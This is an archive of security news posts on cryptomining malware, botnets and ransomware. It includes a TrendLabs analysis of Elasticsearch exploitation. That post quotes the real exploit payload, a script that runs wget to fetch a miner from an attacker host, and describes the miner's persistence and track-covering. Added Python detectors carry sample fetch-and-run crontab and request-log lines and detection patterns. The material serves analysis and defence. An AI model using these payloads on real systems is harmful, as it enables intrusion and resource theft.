Category Archives: cryptocurrency miner

Hide ‘N Seek Botnet Continues to Grow by Infecting IoT Devices Using Default Credentials

Avast security analysts reported that the Hide ‘N Seek botnet continues to grow by infecting vulnerable Internet of Things (IoT) devices still using their default passwords.

According to Avast, the Hide ‘N Seek botnet has two main functions. The first is propagation: a scanner borrowed from Mirai probes random IP addresses for IoT devices and tries well-known exploits against them. If that fails, the scanner falls back to logging in with a hard-coded list of default credentials.

For its second functionality, the IoT botnet uses a peer-to-peer (P2P) protocol to share information about new peers, exfiltrate files from an infected device and distribute new binaries, including some for a Monero cryptocurrency miner. Avast’s researchers believe the Monero miner was just a test and that the attackers’ true intentions are still unknown.

A Busy Year for Hide ‘N Seek

Bitdefender researchers were the first to spot the Hide ‘N Seek botnet in January 2018. A few months later, Bitdefender reported the threat had added code that abused two new vulnerabilities affecting Internet Protocol television (IPTV) camera models to scan for a larger pool of vulnerable devices and to achieve persistence on an infected IoT product.

More improvements followed in July, when 360 Netlab observed additional exploits and a then-inactive mining program. Two months later, Bitdefender discovered yet another update when Hide ‘N Seek gained the ability to exploit the Android Debug Bridge (ADB) over Wi-Fi feature in Android devices.

The botnet’s evolution is of particular concern given the overall growth in IoT threats. In just the first half of 2018, Kaspersky Lab detected 121,588 IoT malware samples, more than three times the number found in all of 2017.

How to Defend Your Organization Against IoT Botnets

Security professionals can help defend against IoT botnets by changing the default passwords on every device their organization deploys, and by verifying that the change actually took effect on each one. Beyond that, security teams should maintain an incident response function that tracks and applies firmware and software patches and handles disclosure of any breaches.

Sources: Avast, Bitdefender (January 2018 discovery), Bitdefender (IPTV camera exploits), 360 Netlab, Bitdefender (ADB over Wi-Fi), Kaspersky Lab

The post Hide ‘N Seek Botnet Continues to Grow by Infecting IoT Devices Using Default Credentials appeared first on Security Intelligence.

TrendLabs Security Intelligence Blog: Cryptocurrency Miner Spreads via Old Vulnerabilities on Elasticsearch

by Jindrich Karasek and Loseway Lu

We detected mining activity on our honeypot that involves Elasticsearch, the open-source, Java-based search engine built on the Lucene library. The attack exploited two long-known vulnerabilities: CVE-2015-1427, a sandbox bypass in the Groovy scripting engine of Elasticsearch before 1.3.8 and 1.4.x before 1.4.3 that lets a remote attacker execute arbitrary shell commands through a crafted script, and CVE-2014-3120, where the default configuration of Elasticsearch before 1.2 left dynamic scripting enabled and so allowed arbitrary code execution through a script embedded in a search request. The honeypot advertised itself as version 1.4.1 (see the IoC section), squarely inside the affected range. The vulnerable versions are no longer supported by the vendor.

We found a search query with the following command (also described in a blog by ISC) on a server running Elasticsearch:

{"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P /tmp/sssooo\").getText()"}}}

The command was issued by the same attacking host that also hosted the payload. At the time of writing, the IP resolved to the domain name matrixhazel[.]com, which was inaccessible. The host was found to be running CentOS 6 with both a web server and an SSH server exposed.

Figure 1. GreyNoise marked the host as a known scanner

It is important to note that this kind of attack is not new, but it has recently reemerged. For instance, Trend Micro Smart Protection Network feedback in November detected the cryptocurrency miner on endpoints in several countries such as China, Taiwan, and the United States.

The injected command invokes the shell to run wget, which fetches the bash script update.sh into the directory /tmp/sssooo (wget’s -P flag sets the download directory prefix, so the script lands at /tmp/sssooo/update.sh rather than in a file of that name). /tmp is chosen because it is world-writable on practically every system, so the download succeeds no matter which account the Elasticsearch process runs under.

This attack is relatively simple, yet it can have a significant impact on the victim. Once attackers can run arbitrary commands on the system, they can attempt to escalate privileges or pivot to other systems to compromise the network further.

It should also be noted that while the scheme of the attack is the same in most cases, the payloads may differ. In the case we analyzed, the payload was the file update.sh. Once run, the bash script downloads two further files, devtools and config.json, and then launches the cryptocurrency miner (detected by Trend Micro as Coinminer.Linux.MALXMR.UWEIS).

The ELF64 binary of the miner itself is named devtools, a name chosen to blend in, since “devtools” is also the name of legitimate developer tooling found on GitHub. The miner reads its configuration from config.json (Figure 2).

Figure 2. Details of the configuration file config.json

Such a scheme is already widely used, but the wrapper bash script has several other interesting functions. Its coding style closely resembles that of publicly available hacking tools, and parts of the code were also seen in an earlier Xbash-related case.

How the cryptocurrency miner is deployed

The miner consists of three files, downloaded through either wget, curl, or url commands in bash:

Figure 3. wget, curl, and url commands

The miner is capable of downloading the following:

  • devtools – the actual miner;
  • update.sh – the bash script used to download all the parts (the script is also run during the attack);
  • config.json – the configuration file for the miner.

The script first tries to save the files into /etc/ and falls back to /tmp if that fails (writing to /etc requires root; in our case the /tmp fallback is what succeeded). It then checks for other mining activity already running on the machine: it assumes the device has already been compromised and hijacks it from the previous attacker. The same routine also lets the operators replace a running miner with a newer version.

Figure 4. Sample of commands that allow the miner to eliminate other existing miners

If it detects other miners in the system, the running processes related to the miners will be killed. It also resets the crontab so cron won’t start other miners again.

Figure 5. Processes of other miners found in the system will be killed

The miner adds itself to the crontab so that it runs every 10 minutes. At the start of each run it unlocks its files with chattr -i and updates them; at the end it reapplies chattr +i, the immutable attribute, which blocks modification or deletion of the files (even by root) until the attribute is cleared again, frustrating both casual cleanup and competing miners. It also covers its tracks by emptying the shell history logs (see Figure 8). One notable detail: when the script is running in the root directory, it tries to append its own SSH key to authorized_keys, which would let the attackers log in without a password. The command order looks buggy, however, as authorized_keys is removed right after the key is added.

Figure 6. Other miner capabilities: components protection, persistence via crontab, and network traffic encryption

Figure 7. Miner modifies the iptables/firewall in the system

Figure 8. Miner cleans its track by removing the history and emptying files

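
The persistence and self-protection behaviour described above (a cron job re-running the wrapper every 10 minutes, dropped files pinned with chattr +i) gives a defender concrete things to look for on a suspect host. The following Python, an added example that is not the TrendLabs authors’ code, parses the text output of crontab -l and lsattr and flags entries matching that pattern. The crontab and lsattr output it consumes are constructed for the demo (the remote path reuses the page’s defanged IoC; the /tmp/sssooo file names are assumptions), and the 10-minute threshold is taken from the post.

```python
"""Triage a Linux host for the wrapper's persistence pattern: a short-period
crontab entry that fetches files and flips the immutable flag, plus files under
/tmp or /etc carrying chattr +i. Added example, not the TrendLabs authors' code.
The crontab and lsattr text below are constructed to mimic the described
behaviour; the hxxp path is the page's defanged IoC."""
import re

DOWNLOADER_RE = re.compile(r"\b(wget|curl|url|ftp|tftp)\b", re.I)
DROP_DIR_RE = re.compile(r"/(?:tmp|etc)/\S+")
MAX_INTERVAL_MIN = 10  # the observed wrapper re-ran itself every 10 minutes


def cron_interval_minutes(schedule_fields):
    """Return the period in minutes for '*/N * * * *' or '* * * * *' schedules,
    or None for anything else (hourly, daily, specific times)."""
    minute, hour, dom, mon, dow = schedule_fields
    if not all(f == "*" for f in (hour, dom, mon, dow)):
        return None
    if minute == "*":
        return 1
    step = re.fullmatch(r"\*/(\d+)", minute)
    return int(step.group(1)) if step else None


def suspicious_cron_entries(crontab_text):
    """Flag short-period jobs whose command fetches files, touches a /tmp or
    /etc drop path, or calls chattr: the combination the wrapper script uses."""
    hits = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # comments and VAR=value lines
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue
        interval = cron_interval_minutes(parts[:5])
        command = parts[5]
        reasons = []
        if DOWNLOADER_RE.search(command):
            reasons.append("downloader")
        if DROP_DIR_RE.search(command):
            reasons.append("drop_dir")
        if "chattr" in command:
            reasons.append("chattr")
        if interval is not None and interval <= MAX_INTERVAL_MIN and reasons:
            hits.append({"interval_min": interval, "reasons": reasons, "command": command})
    return hits


def immutable_drop_files(lsattr_text):
    """Parse 'lsattr -R /tmp /etc' style output ("<flags> <path>" per line) and
    return paths under a drop directory that carry the immutable 'i' flag.
    Legitimate systems rarely pin files there, so each hit deserves a look."""
    pinned = []
    for raw in lsattr_text.splitlines():
        parts = raw.split(None, 1)
        if len(parts) != 2:
            continue
        flags, path = parts
        if "i" in flags and DROP_DIR_RE.match(path):
            pinned.append(path)
    return pinned


# Constructed sample output, not captured from a real host.
SAMPLE_CRONTAB = """\
# constructed for the example
MAILTO=root
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /opt/agent/heartbeat.sh
*/10 * * * * chattr -i /tmp/sssooo/update.sh; curl -fsSL hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -o /tmp/sssooo/update.sh; sh /tmp/sssooo/update.sh
"""

SAMPLE_LSATTR = """\
--------------e------- /tmp/systemd-private-abc/tmp
----i---------e------- /tmp/sssooo/devtools
----i---------e------- /tmp/sssooo/config.json
--------------e------- /etc/hostname
"""

if __name__ == "__main__":
    for entry in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("cron:", entry)
    for path in immutable_drop_files(SAMPLE_LSATTR):
        print("immutable:", path)
```

In practice, feed it the real output: crontab -l for every user plus the files under /etc/cron.d, and lsattr -R /tmp /etc 2>/dev/null. A file pinned with +i cannot be removed until chattr -i is run on it, so a cleanup that only calls rm fails with "Operation not permitted"; clearing the attribute first is part of the remediation, not an afterthought.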
Conclusion and Recommendations

To prevent attacks that exploit known Elasticsearch vulnerabilities, patch regularly and keep security monitoring in place with custom rules that catch both basic events and more complex, correlated alerts. Where a 1.x node cannot be upgraded immediately, the vendor’s published workarounds were to disable dynamic scripting (script.groovy.sandbox.enabled: false in elasticsearch.yml for CVE-2015-1427, script.disable_dynamic: true on the older releases affected by CVE-2014-3120), which removes the primitive these payloads rely on. Port 9200 should never be reachable from untrusted networks: a node that answers _search requests containing a script field with command execution is, in effect, an unauthenticated remote shell.

There are variations to the command injected in Elasticsearch as spotted in the wild, but they have these factors in common:

  • They all invoke shell to run a command;
  • They all contain a command to download a file from remote/local locations, like curl, wget, url, ftp/get, and so on;
  • They download the file into either “/etc” or “/tmp”;
  • They are usually tried in sequence: the attacking host cycles through combinations of download command and target directory until one of them succeeds in fetching the malicious file.

Detection of related attacks is crucial and should be done through these measures:

  • Log Elasticsearch requests and monitor them for strings that suggest command injection, such as Runtime, exec or forName inside a script field, especially alongside a download command.
  • Monitor the system’s behavior. The Elasticsearch process is a Java service that has no reason to spawn a shell, so a shell or downloader running as its child is a high-fidelity indicator; shells should only be run by authorized users and tooling.
  • Classify network traffic through correlation. In our case the malicious IP was contacted regularly, every 10 minutes, by the cron job. That kind of beaconing is easy to spot with the right network monitoring and traffic analysis in place.
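
The two lists above describe what the injected requests have in common and what to log. The following Python, an added example that is not part of the TrendLabs post, turns that into a scan over logged request bodies: it pulls every script string out of each body, flags the Java reflection and exec primitives, and records which downloader, drop directory and URL the command uses. The log lines are constructed for the demo (the third is the page’s own payload, defanged); SCRIPT_KEYS, EXEC_PATTERNS and the 198.51.100.7 address are assumptions of the example, not indicators from the post.

```python
"""Flag Elasticsearch search requests that abuse dynamic scripting for command
execution (the CVE-2014-3120 / CVE-2015-1427 pattern discussed above).

Added example, not code from the TrendLabs post. Assumes request bodies are
available one per line, e.g. exported from a reverse-proxy log in front of
port 9200. The log lines below are constructed; the third is the page's own
payload, kept defanged (hxxp, [.])."""
import json
import re

# Java/Groovy primitives that have no place in a search request.
EXEC_PATTERNS = [
    r"java\.lang\.Runtime",
    r"getRuntime\s*\(",
    r"\.exec\s*\(",
    r"ProcessBuilder",
    r"\.class\.forName|Class\.forName",
]
# Download helpers the observed wrappers cycle through.
DOWNLOADER_RE = re.compile(r"\b(wget|curl|url|ftp|tftp)\b", re.I)
# Both /etc and /tmp were used as drop directories.
DROP_DIR_RE = re.compile(r"/(?:tmp|etc)/")
URL_RE = re.compile(r"h(?:tt|xx)ps?://[^\s\"']+", re.I)
# Keys under which 1.x and later Elasticsearch versions carry script source
# (assumed set for the example).
SCRIPT_KEYS = {"script", "inline", "source"}


def _script_strings(node):
    """Yield every string stored under a script-carrying key, at any depth."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key in SCRIPT_KEYS and isinstance(value, str):
                yield value
            else:
                yield from _script_strings(value)
    elif isinstance(node, list):
        for item in node:
            yield from _script_strings(item)


def extract_scripts(body):
    """Return the script strings in a request body.

    raw_decode() parses the leading JSON object and ignores trailing bytes,
    which matters here: the captured payload on the page ends with an extra
    '}' that json.loads() would reject. Bodies that are not JSON at all
    (truncated captures) fall back to a regex over the raw text."""
    body = body.strip()
    try:
        obj, _end = json.JSONDecoder().raw_decode(body)
        return list(_script_strings(obj))
    except ValueError:
        return re.findall(r'"script"\s*:\s*"((?:[^"\\]|\\.)*)"', body)


def analyse_request(body):
    """Return one finding per script string that contains an exec primitive."""
    findings = []
    for script in extract_scripts(body):
        hits = [p for p in EXEC_PATTERNS if re.search(p, script)]
        if not hits:
            continue  # arithmetic in script_fields is normal on 1.x clusters
        findings.append({
            "exec_indicators": hits,
            "downloader": sorted({m.lower() for m in DOWNLOADER_RE.findall(script)}),
            "drop_dir": bool(DROP_DIR_RE.search(script)),
            "urls": URL_RE.findall(script),
        })
    return findings


def scan_log(lines):
    """Return (line_number, finding) pairs for a sequence of request bodies."""
    return [(n, f) for n, line in enumerate(lines, 1) for f in analyse_request(line)]


# Constructed request log: two benign queries, the page's payload, a variant
# using ProcessBuilder and /etc, and a truncated capture that is not valid JSON.
SAMPLE_LOG = [
    '{"query":{"match":{"message":"timeout"}}}',
    '{"script_fields":{"doubled":{"script":"doc[\'price\'].value * 2"}}}',
    '{"lupin":{"script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\")'
    '.getRuntime().exec(\\"wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/'
    'update.sh -P /tmp/sssooo\\").getText()"}}}',
    '{"size":1,"script_fields":{"x":{"script":"new ProcessBuilder(\\"/bin/sh\\",'
    '\\"-c\\",\\"curl -o /etc/update.sh hxxp://198.51.100.7/u.sh\\").start()"}}}',
    'POST /_search {"script": "java.lang.Runtime.getRuntime().exec(\\"id\\")"',
]

if __name__ == "__main__":
    for line_no, finding in scan_log(SAMPLE_LOG):
        print(line_no, finding)
```

Feed it the request bodies you actually log; a reverse proxy in front of port 9200 is the easiest place to capture them. The raw_decode() step is deliberate: the payload on this page has one unbalanced brace, and a detector built on json.loads() would have discarded it as malformed instead of flagging it.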

Users can consider adopting security solutions that can defend against cryptocurrency-mining malware through a cross-generational blend of threat defense techniques. Trend Micro™ XGen™ security provides high-fidelity machine learning that can secure the gateway and endpoints, and protect physical, virtual, and cloud workloads. With technologies that employ web/URL filtering, behavioral analysis, and custom sandboxing, XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities. XGen security also powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.

Indicators of Compromise (IoCs)

Related hashes (SHA-256)
191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c devtools Coinminer.Linux.MALXMR.UWEIS
d3e1231d1429dccb47caf0c1c46d2eb24afe33887b31a818b8f07f0406db2637 update.sh Coinminer.SH.MALXMR.ATNL

69.30.211.82 – attacker
69.30.203.170 – payload host (see the command below)

Command used in Elasticsearch:

{"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P /tmp/sssooo\").getText()"}}}

Spoofed Elasticsearch version number: 1.4.1

The post Cryptocurrency Miner Spreads via Old Vulnerabilities on Elasticsearch appeared first on TrendLabs Security Intelligence Blog.

KingMiner Maxes Out Windows Server CPUs in Widespread Cryptomining Campaign

Researchers spotted a new cryptomining threat that brute-forces its way onto Microsoft Windows servers running Internet Information Services (IIS) or SQL Server and then consumes 100 percent of their compute resources.

The malware, called KingMiner, is designed not to steal information but to mine cryptocurrencies such as Monero, whose proof-of-work calculations require considerable processing power, according to researchers at Check Point.

KingMiner was first discovered this past June, but it has since spawned a new variant with even stronger cryptomining features that is now active in the wild.

Cryptomining Campaign Drains CPUs

Once it identifies its target, KingMiner attempts to guess the system’s password, then downloads and executes a Windows scriptlet file. In some cases, the malware is already active on the system, in which case the new version kills off its predecessor. Israel, Norway, Mexico and India are among the locations where the cryptomining campaign has successfully infected Windows machines, according to the researchers.

KingMiner uses the open-source XMRig miner to mine Monero. Although its configuration caps usage at 75 percent of a victim’s machine, in practice coding errors cause it to consume the entire capacity of the central processing unit (CPU).

The cybercriminals behind KingMiner also take pains to avoid detection. Because they route mining through a private pool rather than any public one and keep the pool’s application programming interface (API) turned off, it is difficult to estimate how much Monero they have harvested so far. Emulation attempts are thwarted by an XML file disguised as a ZIP archive inside the payload. Additional evasion techniques include adding exported functions and padding content into the executable’s dynamic link library (DLL) files.

How to Keep Cryptomining Malware at Bay

The researchers noted that KingMiner is likely to continue its evolution based on placeholders they found in the code for future updates and versions.

Cybercriminals are increasingly interested in mining cryptocurrency because it requires less social engineering than other schemes and the malware can run quietly in the background. Catching threats such as KingMiner depends on wider adoption of security information and event management (SIEM) technology and better network and endpoint protection.

Source: Check Point

The post KingMiner Maxes Out Windows Server CPUs in Widespread Cryptomining Campaign appeared first on Security Intelligence.

Canadian University Shuts Down Network in Response to Cryptocurrency Mining Attack

St. Francis Xavier University had to take its critical IT systems offline after it discovered a scheme to mine cryptocurrency using its network resources.

On Nov. 9, the school’s IT team identified an automated attack launched by unknown threat actors in an effort to steal computing power to mine cryptocurrency, otherwise known as cryptojacking.

After consulting with security specialists, the university, which is based in Nova Scotia, made the decision to disable all network systems. Representatives of the school announced plans to reinstate the offline servers across its network in stages to reduce potential security risks.

Why Did the University Shut Down Its Network?

So far, the university has reported no evidence that the personal information of students, faculty or other parties has been leaked or stolen as part of the attack. To be safe, however, administrators reset the passwords for all university accounts across campus. The IT team said it would continue to look for anomalous behavior over the next month.

The university’s swift response affected basic access to network resources such as Wi-Fi and the Moodle educational software platform. Meanwhile, student payment cards and debit transactions were temporarily inoperable. The school said it plans to publish a list of which services have been restored and which are still in the queue, such as its MesAmis reporting system and Banner database. The university did not explain exactly how the malware was installed on its systems.

How to Keep Cryptocurrency Mining Threats at Bay

The St. Francis Xavier University incident is an increasingly rare example of cryptojackers targeting bitcoin. Bitcoin mining is dominated by purpose-built ASIC hardware, so stolen general-purpose CPU time earns an attacker almost nothing. Instead, attacks more often hijack IT resources to mine newer cryptocurrencies such as Monero and Ethereum, whose mining algorithms still run acceptably on commodity hardware.

Regardless of what’s being mined, organizations that invest in security information and event management (SIEM) are better positioned to identify cryptojacking before it’s too late to remediate the threat without halting the entire network.

Sources: St. Francis Xavier, ZDNet

The post Canadian University Shuts Down Network in Response to Cryptocurrency Mining Attack appeared first on Security Intelligence.

New Ransomware Strain Evades Detection by All but One Antivirus Engine

Researchers discovered a new strain of Dharma ransomware that is able to evade detection by nearly all of the antivirus solutions on the market.

In October and November 2018, researchers with Heimdal Security uncovered four strains of Dharma, one of the oldest ransomware families still active. One strain was flagged by just one of the 53 antivirus engines on VirusTotal and by just one of the 14 engines used by Jotti’s malware scan; every other scanner in those services let it through.

In its analysis of the strain, Heimdal observed a malicious executable dropped through a .NET file and another associated HTML Application (HTA) file that, when unpacked, directed victims to pay a ransom amount in bitcoin.

How Persistent Is the Threat of Ransomware?

The emergence of the new Dharma strain highlights ransomware’s ongoing relevance as a cyberthreat. Europol declared that it remains the key malware threat in both law enforcement and industry reporting. The agency attributed this proclamation to financially motivated malware attacks increasingly using ransomware over banking Trojans, a trend that it anticipates will continue for years to come.

Europol identified this tendency despite a surge in activity from other threats. For example, Comodo Cybersecurity found that crypto-mining malware rose to the top of detected malware incidents in the first three months of 2018. In so doing, malicious cryptominers supplanted ransomware as the No. 1 digital threat for that quarter, according to Comodo research.

Defend Against New Malware Strains With Strong Endpoint Security

Security professionals can help keep ransomware off their networks by using an endpoint management solution that provides real-time visibility into their endpoints. Experts also recommend using tools that integrate with security information and event management (SIEM) software to streamline responses to potential incidents.

Sources: Heimdal Security, Europol, Comodo Cybersecurity

The post New Ransomware Strain Evades Detection by All but One Antivirus Engine appeared first on Security Intelligence.

Which Threats had the Most Impact During the First Half of 2018?

One of the best ways for organizations to shore up their data security efforts and work toward more proactive protection is by examining trends within the threat environment.

Taking a look at the strategies for attack, infiltration and infection currently being utilized by hackers can point toward the types of security issues that will continue in the future and enable enterprises to be more prepared with the right data and asset safeguarding measures.

Each year brings both continuing and emerging threats which can complicate security efforts. Awareness of the most impactful threats – including those that might have been popular in the past, as well as the new approaches spreading among cybercriminals – is crucial in the data security landscape.

Recently, Trend Micro researchers examined the data protection and cyberthreat issues prevalent during the first half of 2018 and included these findings in the 2018 Midyear Security Roundup: Unseen Threats, Imminent Losses report.

Let’s take a closer look at this research, as well as top identified threats that impacted businesses during the first six months of this year.

Widespread vulnerabilities and software patching

Back in 2014, the world was introduced to Heartbleed. At the time, it was one of the largest and most extensive software vulnerabilities, impacting platforms and websites leveraging the popular OpenSSL cryptographic software library. The bug made global news because of the vast number of websites it affected, as well as the fact that it enabled malicious actors to access, read and potentially leak data stored in systems’ memory.

Since then, further vulnerabilities of comparable reach have been identified, including two at the beginning of 2018: design flaws in modern microprocessors, since dubbed Meltdown and Spectre, were discovered by researchers. Unfortunately, these were not the only high-profile vulnerabilities to make headlines this year.

As Trend Micro reported in May, eight other vulnerabilities were uncovered following Meltdown and Spectre, which also impacted Intel processors, including four that were considered “high” severity threats. Because these processors are used by a considerable number of devices within businesses and consumer environments across the globe, the emerging vulnerabilities were significantly worrisome for security admins and individual users alike.

Vulnerabilities that affect such large numbers of devices and users are a significant challenge for enterprise security postures, in part because patching lags badly behind disclosure. Heartbleed is the cautionary example: The Register reported that an estimated 200,000 systems were still vulnerable to the bug in early 2017, nearly three years after the fix was released.

Installing software updates in a timely manner is a top facet of patching best practices.

Spectre, Meltdown and the series of other identified vulnerabilities showcase the importance of proper patching. Intel made the same point in a statement encouraging users to keep their systems current.

“We believe strongly in the value of coordinated disclosure and will share additional details on any potential issues as we finalize mitigations,” Intel noted, according to TechSpot. “As a best practice, we continue to encourage everyone to keep their systems up-to-date.”

The mere presence of an identified vulnerability can create security weaknesses, but an unpatched system can boost the chances of an attack or breach incident even further. It’s imperative that, in light of these widespread vulnerabilities, enterprises ensure their patching processes are comprehensive and proactive.

Cryptocurrency mining steals valuable resources

Researchers also noted that while cryptocurrency mining activity became more prevalent in 2017, this trend continued into the first half of 2018. Cryptocurrency mining programs can be more of an issue than many users might realize, as such a malicious initiative can rob enterprise infrastructures of key computing resources required to maintain top performance of their critical systems and applications, not to mention result in increased utility costs.

During the first six months of 2018, researchers recorded an increase of more than 140 percent in cryptocurrency mining activity detected through Trend Micro’s Smart Protection Network infrastructure. What’s more, 47 new miner malware families were identified during Q1 and Q2, demonstrating that cryptocurrency mining will remain a top priority for attackers.

“Unwanted cryptocurrency miners on a network can slow down performance, gradually wear down hardware, and consume power – problems that are amplified in enterprise environments,” Trend Micro researchers stated in the Unseen Threats, Imminent Losses report. “IT admins have to keep an eye out for unusual network activity considering the stealthy but significant impact cryptocurrency mining can have on a system.”

Ransomware: No end in sight

For years, ransomware infections have been a formidable threat to organizations in every industry, and the first half of 2018 saw no change in this trend. Researchers again identified an increase in ransomware infection activity, this time of 3 percent. While that may seem small, the sheer volume of ransomware attacks already taking place makes the rise significant.

At the same time, Trend Micro found a 26 percent decrease in new ransomware families. In other words, while attackers continue to use ransomware to extort victims, they are increasingly reusing existing, proven families rather than developing new ones, which leaves defenders facing fewer previously unseen ransomware threats.

Data breaches remain a constant issue for businesses of all shapes and sizes.

Mega breaches: An increasingly frequent issue

As the sophistication and potential severity of hacker activity continue to rise, so too do the consequences of successful attacks.

According to data from the Privacy Rights Clearinghouse, there was a 16 percent increase in data breaches reported in the U.S. during the first half of 2018, including 259 incidents overall. Fifteen of these events were considered “mega breaches,” or those that exposed 1 million records or more over the course of the breach and subsequent fallout.

Such incidents surpass traditional breaches in widespread effects on the victim company, its users and customers and the industry sector at large. Most of these mega breaches (71 percent) took place within the healthcare industry, and when one considers the significant amount of sensitive data healthcare institutions deal with, such threat environment conditions aren’t that surprising.

It’s also important to consider not only the traditional impact of regular and mega breaches – including losses related to company reputation and image, revenue, customer acquisition and retention and more – but the compliance costs that can emerge as well. This is an especially imperative consideration in the age of the EU’s General Data Protection Regulation, which became enforceable in May.

“This regulation … sets a high bar for data security and privacy protection,” Trend Micro’s report stated. “It imposes considerable fines for noncompliant organizations … Moreover, it has quite a long reach since any organization holding EU citizens’ data is affected.”

Check out Trend Micro’s GDPR Resource Center to learn more about maintaining compliance with this standard.

Read Trend Micro’s Unseen Threats, Imminent Losses report for more information about the top threats identified during the first half of this year.

The post Which Threats had the Most Impact During the First Half of 2018? appeared first on .